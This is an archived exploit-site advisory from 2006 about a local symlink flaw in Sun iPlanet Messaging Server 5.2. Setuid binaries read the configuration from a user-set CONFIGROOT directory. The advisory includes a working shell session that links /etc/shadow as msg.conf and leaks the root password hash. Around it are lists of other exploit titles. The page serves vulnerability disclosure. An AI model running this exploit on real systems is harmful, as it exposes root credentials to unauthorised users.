exploits , vulnerabilities , articles , Sun iPlanet Messaging Server 5.2 HotFix 1.16 Root Password Disclosure

2007-04-16 SunShop Shopping Cart 3.5/4.0 (abs_path) RFI Vulnerabilities
2005-08-19 Sun Solaris "printd" Daemon Remote Arbitrary File Deletion Exploit
2003-04-01 Sun SUNWlldap Library Hostname Remote Buffer Overflow Exploit

2006-06-18

Sun iPlanet Messaging Server 5.2 HotFix 1.16 Root Password Disclosure

Rated as : Critical

Date: 14 Jun 2006
Vendor: Sun Microsystems, Inc.
Name: iPlanet Messaging Server
Version: 5.2 HotFix 1.16 (built May 14 2003)
Vuln: msg.conf symlink attack
Severity: high


Software description
----------------
The iPlanet Messaging Server is a software product that provides a
centralized location for the exchange of information through the sending
and receiving of messages. The product is designed for
telecommunications providers, service providers, and enterprises that
offer messaging capabilities to employees, partners, and customers. The
iPlanet Messaging Server delivers a Web-based messaging platform capable
of serving tens of millions of users, and also provides value-added
differentiated services, including outsourcing, wireless ,and unified
messaging services.


Vulnerability desciption
----------------
Setuid programs part of the iPlanet Messaging Server try to read the
configuration file msg.conf.
If the environment variable CONFIGROOT is set, the configuration is read
from that directory.
A symlink attack is possible, and as a result it is possible to read the
first line of any file with uid=0.

Example
----------------
test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/version
iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)
libimta.so 5.2 HotFix 1.16 (built 12:32:17, May 14 2003)
SunOS sunbox 5.9 Generic_118558-22 sun4u sparc SUNW,Sun-Fire-280R Solaris
test@sunbox:/tmp$
test@sunbox:/tmp$ ls -la /iplanet/iMS5/bin/msg/imta/bin/pipe_master
-rws--s--x    1 root     mail       446864 Sep 22  2005
/iplanet/iMS5/bin/msg/imta/bin/pipe_master
test@sunbox:/tmp$
test@sunbox:/tmp$ ln -s /etc/shadow msg.conf
test@sunbox:/tmp$
test@sunbox:/tmp$ export CONFIGROOT=.
test@sunbox:/tmp$
test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/pipe_master
[14/Jun/2006:11:13:49 +0200] sunbox [119]: General Error:
func=_configdrv_file_readoption; error=option name should be followed by
'='; line=root:qW1HFEa1MCD0w:11821:::::: ERROR: Configuration database
initialization failed - see default logfile
test@sunbox:/tmp$

Vulnerable
----------------
iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)

php0t / zorro.hu
www.zorro.hu
securitydot.net - 2006-06-18

Exploits - newest 10 RSS | More

2007-06-15 56120 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33417 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41552 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28778 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19311 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16329 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18964 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16209 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33027 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16844 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit